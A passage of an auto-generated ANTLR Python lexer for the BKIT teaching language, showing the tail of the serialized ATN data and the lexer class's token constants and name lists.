buf.write(\"\\2\\2i\\3\\2\\2\\2\\2k\\3\\2\\2\\2\\2m\\3\\2\\2\\2\\2o\\3\\2\\2\\2\\2q\\3\\2\")\n buf.write(\"\\2\\2\\2s\\3\\2\\2\\2\\2u\\3\\2\\2\\2\\2w\\3\\2\\2\\2\\2y\\3\\2\\2\\2\\2{\\3\")\n buf.write(\"\\2\\2\\2\\2}\\3\\2\\2\\2\\2\\177\\3\\2\\2\\2\\2\\u0081\\3\\2\\2\\2\\2\\u0083\")\n buf.write(\"\\3\\2\\2\\2\\2\\u0085\\3\\2\\2\\2\\2\\u0087\\3\\2\\2\\2\\2\\u0089\\3\\2\\2\")\n buf.write(\"\\2\\2\\u008b\\3\\2\\2\\2\\2\\u008d\\3\\2\\2\\2\\2\\u008f\\3\\2\\2\\2\\2\\u0091\")\n buf.write(\"\\3\\2\\2\\2\\2\\u0093\\3\\2\\2\\2\\2\\u0095\\3\\2\\2\\2\\2\\u0097\\3\\2\\2\")\n buf.write(\"\\2\\2\\u0099\\3\\2\\2\\2\\2\\u009b\\3\\2\\2\\2\\2\\u009d\\3\\2\\2\\2\\2\\u009f\")\n buf.write(\"\\3\\2\\2\\2\\2\\u00a1\\3\\2\\2\\2\\2\\u00a3\\3\\2\\2\\2\\2\\u00a5\\3\\2\\2\")\n buf.write(\"\\2\\2\\u00a7\\3\\2\\2\\2\\3\\u00a9\\3\\2\\2\\2\\5\\u00ac\\3\\2\\2\\2\\7\\u00b4\")\n buf.write(\"\\3\\2\\2\\2\\t\\u00bd\\3\\2\\2\\2\\13\\u00c9\\3\\2\\2\\2\\r\\u00d7\\3\\2\")\n buf.write(\"\\2\\2\\17\\u00e2\\3\\2\\2\\2\\21\\u00e5\\3\\2\\2\\2\\23\\u00eb\\3\\2\\2\")\n buf.write(\"\\2\\25\\u00ed\\3\\2\\2\\2\\27\\u00ef\\3\\2\\2\\2\\31\\u00f3\\3\\2\\2\\2\")\n buf.write(\"\\33\\u00f6\\3\\2\\2\\2\\35\\u00f8\\3\\2\\2\\2\\37\\u00ff\\3\\2\\2\\2!\\u0107\")\n buf.write(\"\\3\\2\\2\\2#\\u0112\\3\\2\\2\\2%\\u0115\\3\\2\\2\\2\\'\\u0118\\3\\2\\2\\2\")\n buf.write(\")\\u011e\\3\\2\\2\\2+\\u0120\\3\\2\\2\\2-\\u0122\\3\\2\\2\\2/\\u0128\\3\")\n buf.write(\"\\2\\2\\2\\61\\u0130\\3\\2\\2\\2\\63\\u0138\\3\\2\\2\\2\\65\\u0142\\3\\2\")\n buf.write(\"\\2\\2\\67\\u0144\\3\\2\\2\\29\\u0148\\3\\2\\2\\2;\\u014a\\3\\2\\2\\2=\\u0154\")\n buf.write(\"\\3\\2\\2\\2?\\u0159\\3\\2\\2\\2A\\u015f\\3\\2\\2\\2C\\u0168\\3\\2\\2\\2\")\n buf.write(\"E\\u016b\\3\\2\\2\\2G\\u0170\\3\\2\\2\\2I\\u0177\\3\\2\\2\\2K\\u017e\\3\")\n buf.write(\"\\2\\2\\2M\\u0184\\3\\2\\2\\2O\\u018b\\3\\2\\2\\2Q\\u0194\\3\\2\\2\\2S\\u0198\")\n buf.write(\"\\3\\2\\2\\2U\\u01a1\\3\\2\\2\\2W\\u01a4\\3\\2\\2\\2Y\\u01ae\\3\\2\\2\\2\")\n buf.write(\"[\\u01b5\\3\\2\\2\\2]\\u01ba\\3\\2\\2\\2_\\u01be\\3\\2\\2\\2a\\u01c4\\3\")\n buf.write(\"\\2\\2\\2c\\u01c9\\3\\2\\2\\2e\\u01cf\\3\\2\\2\\2g\\u01d5\\3\\2\\2\\2i\\u01d7\")\n buf.write(\"\\3\\2\\2\\2k\\u01da\\3\\2\\2\\2m\\u01dc\\3\\2\\2\\2o\\u01df\\3\\2\\2\\2\")\n buf.write(\"q\\u01e1\\3\\2\\2\\2s\\u01e4\\3\\2\\2\\2u\\u01e6\\3\\2\\2\\2w\\u01e9\\3\")\n buf.write(\"\\2\\2\\2y\\u01eb\\3\\2\\2\\2{\\u01ed\\3\\2\\2\\2}\\u01f0\\3\\2\\2\\2\\177\")\n buf.write(\"\\u01f3\\3\\2\\2\\2\\u0081\\u01f6\\3\\2\\2\\2\\u0083\\u01f9\\3\\2\\2\\2\")\n buf.write(\"\\u0085\\u01fb\\3\\2\\2\\2\\u0087\\u01fd\\3\\2\\2\\2\\u0089\\u0200\\3\")\n buf.write(\"\\2\\2\\2\\u008b\\u0203\\3\\2\\2\\2\\u008d\\u0207\\3\\2\\2\\2\\u008f\\u020a\")\n buf.write(\"\\3\\2\\2\\2\\u0091\\u020d\\3\\2\\2\\2\\u0093\\u0211\\3\\2\\2\\2\\u0095\")\n buf.write(\"\\u0215\\3\\2\\2\\2\\u0097\\u0217\\3\\2\\2\\2\\u0099\\u0219\\3\\2\\2\\2\")\n buf.write(\"\\u009b\\u021b\\3\\2\\2\\2\\u009d\\u021d\\3\\2\\2\\2\\u009f\\u021f\\3\")\n buf.write(\"\\2\\2\\2\\u00a1\\u0221\\3\\2\\2\\2\\u00a3\\u0223\\3\\2\\2\\2\\u00a5\\u0225\")\n buf.write(\"\\3\\2\\2\\2\\u00a7\\u0227\\3\\2\\2\\2\\u00a9\\u00aa\\5\\33\\16\\2\\u00aa\")\n buf.write(\"\\u00ab\\5!\\21\\2\\u00ab\\4\\3\\2\\2\\2\\u00ac\\u00b1\\5\\23\\n\\2\\u00ad\")\n buf.write(\"\\u00b0\\5\\23\\n\\2\\u00ae\\u00b0\\5\\27\\f\\2\\u00af\\u00ad\\3\\2\\2\")\n buf.write(\"\\2\\u00af\\u00ae\\3\\2\\2\\2\\u00b0\\u00b3\\3\\2\\2\\2\\u00b1\\u00af\")\n buf.write(\"\\3\\2\\2\\2\\u00b1\\u00b2\\3\\2\\2\\2\\u00b2\\6\\3\\2\\2\\2\\u00b3\\u00b1\")\n buf.write(\"\\3\\2\\2\\2\\u00b4\\u00b8\\7$\\2\\2\\u00b5\\u00b7\\5)\\25\\2\\u00b6\")\n buf.write(\"\\u00b5\\3\\2\\2\\2\\u00b7\\u00ba\\3\\2\\2\\2\\u00b8\\u00b6\\3\\2\\2\\2\")\n buf.write(\"\\u00b8\\u00b9\\3\\2\\2\\2\\u00b9\\u00bb\\3\\2\\2\\2\\u00ba\\u00b8\\3\")\n buf.write(\"\\2\\2\\2\\u00bb\\u00bc\\5#\\22\\2\\u00bc\\b\\3\\2\\2\\2\\u00bd\\u00c1\")\n buf.write(\"\\7$\\2\\2\\u00be\\u00c0\\5)\\25\\2\\u00bf\\u00be\\3\\2\\2\\2\\u00c0\")\n buf.write(\"\\u00c3\\3\\2\\2\\2\\u00c1\\u00bf\\3\\2\\2\\2\\u00c1\\u00c2\\3\\2\\2\\2\")\n buf.write(\"\\u00c2\\u00c5\\3\\2\\2\\2\\u00c3\\u00c1\\3\\2\\2\\2\\u00c4\\u00c6\\t\")\n buf.write(\"\\2\\2\\2\\u00c5\\u00c4\\3\\2\\2\\2\\u00c6\\u00c7\\3\\2\\2\\2\\u00c7\\u00c8\")\n buf.write(\"\\b\\5\\2\\2\\u00c8\\n\\3\\2\\2\\2\\u00c9\\u00ca\\7,\\2\\2\\u00ca\\u00cb\")\n buf.write(\"\\7,\\2\\2\\u00cb\\u00cf\\3\\2\\2\\2\\u00cc\\u00ce\\13\\2\\2\\2\\u00cd\")\n buf.write(\"\\u00cc\\3\\2\\2\\2\\u00ce\\u00d1\\3\\2\\2\\2\\u00cf\\u00d0\\3\\2\\2\\2\")\n buf.write(\"\\u00cf\\u00cd\\3\\2\\2\\2\\u00d0\\u00d2\\3\\2\\2\\2\\u00d1\\u00cf\\3\")\n buf.write(\"\\2\\2\\2\\u00d2\\u00d3\\7,\\2\\2\\u00d3\\u00d4\\7,\\2\\2\\u00d4\\u00d5\")\n buf.write(\"\\3\\2\\2\\2\\u00d5\\u00d6\\b\\6\\3\\2\\u00d6\\f\\3\\2\\2\\2\\u00d7\\u00d8\")\n buf.write(\"\\7,\\2\\2\\u00d8\\u00d9\\7,\\2\\2\\u00d9\\u00dd\\3\\2\\2\\2\\u00da\\u00dc\")\n buf.write(\"\\13\\2\\2\\2\\u00db\\u00da\\3\\2\\2\\2\\u00dc\\u00df\\3\\2\\2\\2\\u00dd\")\n buf.write(\"\\u00de\\3\\2\\2\\2\\u00dd\\u00db\\3\\2\\2\\2\\u00de\\u00e0\\3\\2\\2\\2\")\n buf.write(\"\\u00df\\u00dd\\3\\2\\2\\2\\u00e0\\u00e1\\7\\2\\2\\3\\u00e1\\16\\3\\2\")\n buf.write(\"\\2\\2\\u00e2\\u00e3\\t\\3\\2\\2\\u00e3\\20\\3\\2\\2\\2\\u00e4\\u00e6\")\n buf.write(\"\\t\\4\\2\\2\\u00e5\\u00e4\\3\\2\\2\\2\\u00e6\\u00e7\\3\\2\\2\\2\\u00e7\")\n buf.write(\"\\u00e5\\3\\2\\2\\2\\u00e7\\u00e8\\3\\2\\2\\2\\u00e8\\u00e9\\3\\2\\2\\2\")\n buf.write(\"\\u00e9\\u00ea\\b\\t\\3\\2\\u00ea\\22\\3\\2\\2\\2\\u00eb\\u00ec\\t\\5\")\n buf.write(\"\\2\\2\\u00ec\\24\\3\\2\\2\\2\\u00ed\\u00ee\\t\\6\\2\\2\\u00ee\\26\\3\\2\")\n buf.write(\"\\2\\2\\u00ef\\u00f0\\t\\7\\2\\2\\u00f0\\30\\3\\2\\2\\2\\u00f1\\u00f4\")\n buf.write(\"\\5\\23\\n\\2\\u00f2\\u00f4\\5\\25\\13\\2\\u00f3\\u00f1\\3\\2\\2\\2\\u00f3\")\n buf.write(\"\\u00f2\\3\\2\\2\\2\\u00f4\\32\\3\\2\\2\\2\\u00f5\\u00f7\\t\\b\\2\\2\\u00f6\")\n buf.write(\"\\u00f5\\3\\2\\2\\2\\u00f6\\u00f7\\3\\2\\2\\2\\u00f7\\34\\3\\2\\2\\2\\u00f8\")\n buf.write(\"\\u00f9\\t\\t\\2\\2\\u00f9\\u00fb\\5\\33\\16\\2\\u00fa\\u00fc\\5\\27\")\n buf.write(\"\\f\\2\\u00fb\\u00fa\\3\\2\\2\\2\\u00fc\\u00fd\\3\\2\\2\\2\\u00fd\\u00fb\")\n buf.write(\"\\3\\2\\2\\2\\u00fd\\u00fe\\3\\2\\2\\2\\u00fe\\36\\3\\2\\2\\2\\u00ff\\u0103\")\n buf.write(\"\\t\\n\\2\\2\\u0100\\u0102\\5\\27\\f\\2\\u0101\\u0100\\3\\2\\2\\2\\u0102\")\n buf.write(\"\\u0105\\3\\2\\2\\2\\u0103\\u0101\\3\\2\\2\\2\\u0103\\u0104\\3\\2\\2\\2\")\n buf.write(\"\\u0104 \\3\\2\\2\\2\\u0105\\u0103\\3\\2\\2\\2\\u0106\\u0108\\5\\27\\f\")\n buf.write(\"\\2\\u0107\\u0106\\3\\2\\2\\2\\u0108\\u0109\\3\\2\\2\\2\\u0109\\u0107\")\n buf.write(\"\\3\\2\\2\\2\\u0109\\u010a\\3\\2\\2\\2\\u010a\\u0110\\3\\2\\2\\2\\u010b\")\n buf.write(\"\\u010d\\5\\37\\20\\2\\u010c\\u010e\\5\\35\\17\\2\\u010d\\u010c\\3\\2\")\n buf.write(\"\\2\\2\\u010d\\u010e\\3\\2\\2\\2\\u010e\\u0111\\3\\2\\2\\2\\u010f\\u0111\")\n buf.write(\"\\5\\35\\17\\2\\u0110\\u010b\\3\\2\\2\\2\\u0110\\u010f\\3\\2\\2\\2\\u0111\")\n buf.write(\"\\\"\\3\\2\\2\\2\\u0112\\u0113\\7^\\2\\2\\u0113\\u0114\\n\\13\\2\\2\\u0114\")\n buf.write(\"$\\3\\2\\2\\2\\u0115\\u0116\\7^\\2\\2\\u0116\\u0117\\t\\13\\2\\2\\u0117\")\n buf.write(\"&\\3\\2\\2\\2\\u0118\\u0119\\7)\\2\\2\\u0119\\u011a\\7$\\2\\2\\u011a\")\n buf.write(\"(\\3\\2\\2\\2\\u011b\\u011f\\n\\f\\2\\2\\u011c\\u011f\\5%\\23\\2\\u011d\")\n buf.write(\"\\u011f\\5\\'\\24\\2\\u011e\\u011b\\3\\2\\2\\2\\u011e\\u011c\\3\\2\\2\")\n buf.write(\"\\2\\u011e\\u011d\\3\\2\\2\\2\\u011f*\\3\\2\\2\\2\\u0120\\u0121\\t\\r\")\n buf.write(\"\\2\\2\\u0121,\\3\\2\\2\\2\\u0122\\u0123\\t\\16\\2\\2\\u0123.\\3\\2\\2\")\n buf.write(\"\\2\\u0124\\u0125\\7\\62\\2\\2\\u0125\\u0129\\7z\\2\\2\\u0126\\u0127\")\n buf.write(\"\\7\\62\\2\\2\\u0127\\u0129\\7Z\\2\\2\\u0128\\u0124\\3\\2\\2\\2\\u0128\")\n buf.write(\"\\u0126\\3\\2\\2\\2\\u0129\\u012b\\3\\2\\2\\2\\u012a\\u012c\\5+\\26\\2\")\n buf.write(\"\\u012b\\u012a\\3\\2\\2\\2\\u012c\\u012d\\3\\2\\2\\2\\u012d\\u012b\\3\")\n buf.write(\"\\2\\2\\2\\u012d\\u012e\\3\\2\\2\\2\\u012e\\60\\3\\2\\2\\2\\u012f\\u0131\")\n buf.write(\"\\5\\27\\f\\2\\u0130\\u012f\\3\\2\\2\\2\\u0131\\u0132\\3\\2\\2\\2\\u0132\")\n buf.write(\"\\u0130\\3\\2\\2\\2\\u0132\\u0133\\3\\2\\2\\2\\u0133\\62\\3\\2\\2\\2\\u0134\")\n buf.write(\"\\u0135\\7\\62\\2\\2\\u0135\\u0139\\7q\\2\\2\\u0136\\u0137\\7\\62\\2\")\n buf.write(\"\\2\\u0137\\u0139\\7Q\\2\\2\\u0138\\u0134\\3\\2\\2\\2\\u0138\\u0136\")\n buf.write(\"\\3\\2\\2\\2\\u0139\\u013b\\3\\2\\2\\2\\u013a\\u013c\\5-\\27\\2\\u013b\")\n buf.write(\"\\u013a\\3\\2\\2\\2\\u013c\\u013d\\3\\2\\2\\2\\u013d\\u013b\\3\\2\\2\\2\")\n buf.write(\"\\u013d\\u013e\\3\\2\\2\\2\\u013e\\64\\3\\2\\2\\2\\u013f\\u0143\\5\\61\")\n buf.write(\"\\31\\2\\u0140\\u0143\\5/\\30\\2\\u0141\\u0143\\5\\63\\32\\2\\u0142\")\n buf.write(\"\\u013f\\3\\2\\2\\2\\u0142\\u0140\\3\\2\\2\\2\\u0142\\u0141\\3\\2\\2\\2\")\n buf.write(\"\\u0143\\66\\3\\2\\2\\2\\u0144\\u0145\\5!\\21\\2\\u01458\\3\\2\\2\\2\\u0146\")\n buf.write(\"\\u0149\\5a\\61\\2\\u0147\\u0149\\5c\\62\\2\\u0148\\u0146\\3\\2\\2\\2\")\n buf.write(\"\\u0148\\u0147\\3\\2\\2\\2\\u0149:\\3\\2\\2\\2\\u014a\\u014e\\7$\\2\\2\")\n buf.write(\"\\u014b\\u014d\\5)\\25\\2\\u014c\\u014b\\3\\2\\2\\2\\u014d\\u0150\\3\")\n buf.write(\"\\2\\2\\2\\u014e\\u014c\\3\\2\\2\\2\\u014e\\u014f\\3\\2\\2\\2\\u014f\\u0151\")\n buf.write(\"\\3\\2\\2\\2\\u0150\\u014e\\3\\2\\2\\2\\u0151\\u0152\\7$\\2\\2\\u0152\")\n buf.write(\"\\u0153\\b\\36\\4\\2\\u0153<\\3\\2\\2\\2\\u0154\\u0155\\7D\\2\\2\\u0155\")\n buf.write(\"\\u0156\\7q\\2\\2\\u0156\\u0157\\7f\\2\\2\\u0157\\u0158\\7{\\2\\2\\u0158\")\n buf.write(\">\\3\\2\\2\\2\\u0159\\u015a\\7D\\2\\2\\u015a\\u015b\\7t\\2\\2\\u015b\")\n buf.write(\"\\u015c\\7g\\2\\2\\u015c\\u015d\\7c\\2\\2\\u015d\\u015e\\7m\\2\\2\\u015e\")\n buf.write(\"@\\3\\2\\2\\2\\u015f\\u0160\\7E\\2\\2\\u0160\\u0161\\7q\\2\\2\\u0161\")\n buf.write(\"\\u0162\\7p\\2\\2\\u0162\\u0163\\7v\\2\\2\\u0163\\u0164\\7k\\2\\2\\u0164\")\n buf.write(\"\\u0165\\7p\\2\\2\\u0165\\u0166\\7w\\2\\2\\u0166\\u0167\\7g\\2\\2\\u0167\")\n buf.write(\"B\\3\\2\\2\\2\\u0168\\u0169\\7F\\2\\2\\u0169\\u016a\\7q\\2\\2\\u016a\")\n buf.write(\"D\\3\\2\\2\\2\\u016b\\u016c\\7G\\2\\2\\u016c\\u016d\\7n\\2\\2\\u016d\")\n buf.write(\"\\u016e\\7u\\2\\2\\u016e\\u016f\\7g\\2\\2\\u016fF\\3\\2\\2\\2\\u0170\")\n buf.write(\"\\u0171\\7G\\2\\2\\u0171\\u0172\\7n\\2\\2\\u0172\\u0173\\7U\\2\\2\\u0173\")\n buf.write(\"\\u0174\\7g\\2\\2\\u0174\\u0175\\7n\\2\\2\\u0175\\u0176\\7h\\2\\2\\u0176\")\n buf.write(\"H\\3\\2\\2\\2\\u0177\\u0178\\7G\\2\\2\\u0178\\u0179\\7n\\2\\2\\u0179\")\n buf.write(\"\\u017a\\7u\\2\\2\\u017a\\u017b\\7g\\2\\2\\u017b\\u017c\\7K\\2\\2\\u017c\")\n buf.write(\"\\u017d\\7h\\2\\2\\u017dJ\\3\\2\\2\\2\\u017e\\u017f\\7G\\2\\2\\u017f\")\n buf.write(\"\\u0180\\7p\\2\\2\\u0180\\u0181\\7f\\2\\2\\u0181\\u0182\\7K\\2\\2\\u0182\")\n buf.write(\"\\u0183\\7h\\2\\2\\u0183L\\3\\2\\2\\2\\u0184\\u0185\\7G\\2\\2\\u0185\")\n buf.write(\"\\u0186\\7p\\2\\2\\u0186\\u0187\\7f\\2\\2\\u0187\\u0188\\7H\\2\\2\\u0188\")\n buf.write(\"\\u0189\\7q\\2\\2\\u0189\\u018a\\7t\\2\\2\\u018aN\\3\\2\\2\\2\\u018b\")\n buf.write(\"\\u018c\\7G\\2\\2\\u018c\\u018d\\7p\\2\\2\\u018d\\u018e\\7f\\2\\2\\u018e\")\n buf.write(\"\\u018f\\7Y\\2\\2\\u018f\\u0190\\7j\\2\\2\\u0190\\u0191\\7k\\2\\2\\u0191\")\n buf.write(\"\\u0192\\7n\\2\\2\\u0192\\u0193\\7g\\2\\2\\u0193P\\3\\2\\2\\2\\u0194\")\n buf.write(\"\\u0195\\7H\\2\\2\\u0195\\u0196\\7q\\2\\2\\u0196\\u0197\\7t\\2\\2\\u0197\")\n buf.write(\"R\\3\\2\\2\\2\\u0198\\u0199\\7H\\2\\2\\u0199\\u019a\\7w\\2\\2\\u019a\")\n buf.write(\"\\u019b\\7p\\2\\2\\u019b\\u019c\\7e\\2\\2\\u019c\\u019d\\7v\\2\\2\\u019d\")\n buf.write(\"\\u019e\\7k\\2\\2\\u019e\\u019f\\7q\\2\\2\\u019f\\u01a0\\7p\\2\\2\\u01a0\")\n buf.write(\"T\\3\\2\\2\\2\\u01a1\\u01a2\\7K\\2\\2\\u01a2\\u01a3\\7h\\2\\2\\u01a3\")\n buf.write(\"V\\3\\2\\2\\2\\u01a4\\u01a5\\7R\\2\\2\\u01a5\\u01a6\\7c\\2\\2\\u01a6\")\n buf.write(\"\\u01a7\\7t\\2\\2\\u01a7\\u01a8\\7c\\2\\2\\u01a8\\u01a9\\7o\\2\\2\\u01a9\")\n buf.write(\"\\u01aa\\7g\\2\\2\\u01aa\\u01ab\\7v\\2\\2\\u01ab\\u01ac\\7g\\2\\2\\u01ac\")\n buf.write(\"\\u01ad\\7t\\2\\2\\u01adX\\3\\2\\2\\2\\u01ae\\u01af\\7T\\2\\2\\u01af\")\n buf.write(\"\\u01b0\\7g\\2\\2\\u01b0\\u01b1\\7v\\2\\2\\u01b1\\u01b2\\7w\\2\\2\\u01b2\")\n buf.write(\"\\u01b3\\7t\\2\\2\\u01b3\\u01b4\\7p\\2\\2\\u01b4Z\\3\\2\\2\\2\\u01b5\")\n buf.write(\"\\u01b6\\7V\\2\\2\\u01b6\\u01b7\\7j\\2\\2\\u01b7\\u01b8\\7g\\2\\2\\u01b8\")\n buf.write(\"\\u01b9\\7p\\2\\2\\u01b9\\\\\\3\\2\\2\\2\\u01ba\\u01bb\\7X\\2\\2\\u01bb\")\n buf.write(\"\\u01bc\\7c\\2\\2\\u01bc\\u01bd\\7t\\2\\2\\u01bd^\\3\\2\\2\\2\\u01be\")\n buf.write(\"\\u01bf\\7Y\\2\\2\\u01bf\\u01c0\\7j\\2\\2\\u01c0\\u01c1\\7k\\2\\2\\u01c1\")\n buf.write(\"\\u01c2\\7n\\2\\2\\u01c2\\u01c3\\7g\\2\\2\\u01c3`\\3\\2\\2\\2\\u01c4\")\n buf.write(\"\\u01c5\\7V\\2\\2\\u01c5\\u01c6\\7t\\2\\2\\u01c6\\u01c7\\7w\\2\\2\\u01c7\")\n buf.write(\"\\u01c8\\7g\\2\\2\\u01c8b\\3\\2\\2\\2\\u01c9\\u01ca\\7H\\2\\2\\u01ca\")\n buf.write(\"\\u01cb\\7c\\2\\2\\u01cb\\u01cc\\7n\\2\\2\\u01cc\\u01cd\\7u\\2\\2\\u01cd\")\n buf.write(\"\\u01ce\\7g\\2\\2\\u01ced\\3\\2\\2\\2\\u01cf\\u01d0\\7G\\2\\2\\u01d0\")\n buf.write(\"\\u01d1\\7p\\2\\2\\u01d1\\u01d2\\7f\\2\\2\\u01d2\\u01d3\\7F\\2\\2\\u01d3\")\n buf.write(\"\\u01d4\\7q\\2\\2\\u01d4f\\3\\2\\2\\2\\u01d5\\u01d6\\7-\\2\\2\\u01d6\")\n buf.write(\"h\\3\\2\\2\\2\\u01d7\\u01d8\\7-\\2\\2\\u01d8\\u01d9\\7\\60\\2\\2\\u01d9\")\n buf.write(\"j\\3\\2\\2\\2\\u01da\\u01db\\7/\\2\\2\\u01dbl\\3\\2\\2\\2\\u01dc\\u01dd\")\n buf.write(\"\\7/\\2\\2\\u01dd\\u01de\\7\\60\\2\\2\\u01den\\3\\2\\2\\2\\u01df\\u01e0\")\n buf.write(\"\\7,\\2\\2\\u01e0p\\3\\2\\2\\2\\u01e1\\u01e2\\7,\\2\\2\\u01e2\\u01e3\")\n buf.write(\"\\7\\60\\2\\2\\u01e3r\\3\\2\\2\\2\\u01e4\\u01e5\\7^\\2\\2\\u01e5t\\3\\2\")\n buf.write(\"\\2\\2\\u01e6\\u01e7\\7^\\2\\2\\u01e7\\u01e8\\7\\60\\2\\2\\u01e8v\\3\")\n buf.write(\"\\2\\2\\2\\u01e9\\u01ea\\7\\'\\2\\2\\u01eax\\3\\2\\2\\2\\u01eb\\u01ec\")\n buf.write(\"\\7#\\2\\2\\u01ecz\\3\\2\\2\\2\\u01ed\\u01ee\\7(\\2\\2\\u01ee\\u01ef\")\n buf.write(\"\\7(\\2\\2\\u01ef|\\3\\2\\2\\2\\u01f0\\u01f1\\7~\\2\\2\\u01f1\\u01f2\")\n buf.write(\"\\7~\\2\\2\\u01f2~\\3\\2\\2\\2\\u01f3\\u01f4\\7?\\2\\2\\u01f4\\u01f5\")\n buf.write(\"\\7?\\2\\2\\u01f5\\u0080\\3\\2\\2\\2\\u01f6\\u01f7\\7#\\2\\2\\u01f7\\u01f8\")\n buf.write(\"\\7?\\2\\2\\u01f8\\u0082\\3\\2\\2\\2\\u01f9\\u01fa\\7>\\2\\2\\u01fa\\u0084\")\n buf.write(\"\\3\\2\\2\\2\\u01fb\\u01fc\\7@\\2\\2\\u01fc\\u0086\\3\\2\\2\\2\\u01fd\")\n buf.write(\"\\u01fe\\7>\\2\\2\\u01fe\\u01ff\\7?\\2\\2\\u01ff\\u0088\\3\\2\\2\\2\\u0200\")\n buf.write(\"\\u0201\\7@\\2\\2\\u0201\\u0202\\7?\\2\\2\\u0202\\u008a\\3\\2\\2\\2\\u0203\")\n buf.write(\"\\u0204\\7?\\2\\2\\u0204\\u0205\\7^\\2\\2\\u0205\\u0206\\7?\\2\\2\\u0206\")\n buf.write(\"\\u008c\\3\\2\\2\\2\\u0207\\u0208\\7>\\2\\2\\u0208\\u0209\\7\\60\\2\\2\")\n buf.write(\"\\u0209\\u008e\\3\\2\\2\\2\\u020a\\u020b\\7@\\2\\2\\u020b\\u020c\\7\")\n buf.write(\"\\60\\2\\2\\u020c\\u0090\\3\\2\\2\\2\\u020d\\u020e\\7>\\2\\2\\u020e\\u020f\")\n buf.write(\"\\7?\\2\\2\\u020f\\u0210\\7\\60\\2\\2\\u0210\\u0092\\3\\2\\2\\2\\u0211\")\n buf.write(\"\\u0212\\7@\\2\\2\\u0212\\u0213\\7?\\2\\2\\u0213\\u0214\\7\\60\\2\\2\")\n buf.write(\"\\u0214\\u0094\\3\\2\\2\\2\\u0215\\u0216\\7*\\2\\2\\u0216\\u0096\\3\")\n buf.write(\"\\2\\2\\2\\u0217\\u0218\\7+\\2\\2\\u0218\\u0098\\3\\2\\2\\2\\u0219\\u021a\")\n buf.write(\"\\7]\\2\\2\\u021a\\u009a\\3\\2\\2\\2\\u021b\\u021c\\7_\\2\\2\\u021c\\u009c\")\n buf.write(\"\\3\\2\\2\\2\\u021d\\u021e\\7}\\2\\2\\u021e\\u009e\\3\\2\\2\\2\\u021f\")\n buf.write(\"\\u0220\\7\\177\\2\\2\\u0220\\u00a0\\3\\2\\2\\2\\u0221\\u0222\\7<\\2\")\n buf.write(\"\\2\\u0222\\u00a2\\3\\2\\2\\2\\u0223\\u0224\\7\\60\\2\\2\\u0224\\u00a4\")\n buf.write(\"\\3\\2\\2\\2\\u0225\\u0226\\7=\\2\\2\\u0226\\u00a6\\3\\2\\2\\2\\u0227\")\n buf.write(\"\\u0228\\7.\\2\\2\\u0228\\u00a8\\3\\2\\2\\2\\33\\2\\u00af\\u00b1\\u00b8\")\n buf.write(\"\\u00c1\\u00c5\\u00cf\\u00dd\\u00e7\\u00f3\\u00f6\\u00fd\\u0103\")\n buf.write(\"\\u0109\\u010d\\u0110\\u011e\\u0128\\u012d\\u0132\\u0138\\u013d\")\n buf.write(\"\\u0142\\u0148\\u014e\\5\\3\\5\\2\\b\\2\\2\\3\\36\\3\")\n return buf.getvalue()\n\n\nclass BKITLexer(Lexer):\n\n atn = ATNDeserializer().deserialize(serializedATN())\n\n decisionsToDFA = [ DFA(ds, i) for i, ds in enumerate(atn.decisionToState) ]\n\n REAL_NUMBER = 1\n ID = 2\n ILLEGAL_ESCAPE = 3\n UNCLOSE_STRING = 4\n COMMENT = 5\n UNTERMINATED_COMMENT = 6\n ERROR_CHAR = 7\n WS = 8\n Integer_literal = 9\n Float_literal = 10\n Boolean_literal = 11\n String_literal = 12\n BODY = 13\n BREAK = 14\n CONTINUE = 15\n DO = 16\n ELSE = 17\n ELSELF = 18\n ELSEIF = 19\n ENDBODY = 20\n ENDFOR = 21\n ENDWHILE = 22\n FOR = 23\n FUNCTION = 24\n IF = 25\n PARAMETER = 26\n RETURN = 27\n THEN = 28\n VAR = 29\n WHILE = 30\n TRUE = 31\n FALSE = 32\n ENDDO = 33\n PLUS_INT = 34\n PLUS_FLOAT = 35\n MINUS_INT = 36\n MINUS_FLOAT = 37\n STAR_INT = 38\n STAR_FLOAT = 39\n DIV_INT = 40\n DIV_FLOAT = 41\n MOD = 42\n NOT = 43\n AND = 44\n OR = 45\n EQUAL = 46\n NOT_EQUAL_INT = 47\n LESS_INT = 48\n GREATER_INT = 49\n LESS_OR_EQUAL_INT = 50\n GREATER_OR_EQUAL_INT = 51\n NOT_EQUAL_FLOAT = 52\n LESS_FLOAT = 53\n GREATER_FLOAT = 54\n LESS_OR_EQUAL_FLOAT = 55\n GREATER_OR_EQUAL_FLOAT = 56\n LEFT_PAREN = 57\n RIGHT_PARENT = 58\n LEFT_BRACKET = 59\n RIGHT_BRACKET = 60\n LEFT_BRACE = 61\n RIGHT_BRACE = 62\n COLON = 63\n DOT = 64\n SEMI = 65\n COMMA = 66\n\n channelNames = [ u\"DEFAULT_TOKEN_CHANNEL\", u\"HIDDEN\" ]\n\n modeNames = [ \"DEFAULT_MODE\" ]\n\n literalNames = [ \"<INVALID>\",\n \"'Body'\", \"'Break'\", \"'Continue'\", \"'Do'\", \"'Else'\", \"'ElSelf'\", \n \"'ElseIf'\", \"'EndIf'\", \"'EndFor'\", \"'EndWhile'\", \"'For'\", \"'Function'\", \n \"'If'\", \"'Parameter'\", \"'Return'\", \"'Then'\", \"'Var'\", \"'While'\", \n \"'True'\", \"'False'\", \"'EndDo'\", \"'+'\", \"'+.'\", \"'-'\", \"'-.'\", \n \"'*'\", \"'*.'\", \"'\\\\'\", \"'\\\\.'\", \"'%'\", \"'!'\", \"'&&'\", \"'||'\", \n \"'=='\", \"'!='\", \"'<'\", \"'>'\", \"'<='\", \"'>='\", \"'=\\\\='\", \"'<.'\", \n \"'>.'\", \"'<=.'\", \"'>=.'\", \"'('\", \"')'\", \"'['\", \"']'\", \"'{'\", \n \"'}'\", \"':'\", \"'.'\", \"';'\", \"','\" ]\n\n symbolicNames = [ \"<INVALID>\",\n \"REAL_NUMBER\", \"ID\", \"ILLEGAL_ESCAPE\", \"UNCLOSE_STRING\", \"COMMENT\", \n \"UNTERMINATED_COMMENT\", \"ERROR_CHAR\", \"WS\", \"Integer_literal\", \n \"Float_literal\", \"Boolean_literal\", \"String_literal\", \"BODY\", \n \"BREAK\", \"CONTINUE\", \"DO\", \"ELSE\", \"ELSELF\", \"ELSEIF\", \"ENDBODY\", \n \"ENDFOR\", \"ENDWHILE\", \"FOR\", \"FUNCTION\", \"IF\", \"PARAMETER\", \n \"RETURN\", \"THEN\", \"VAR\", \"WHILE\", \"TRUE\", \"FALSE\", \"ENDDO\", \n \"PLUS_INT\", \"PLUS_FLOAT\", \"MINUS_INT\", \"MINUS_FLOAT\", 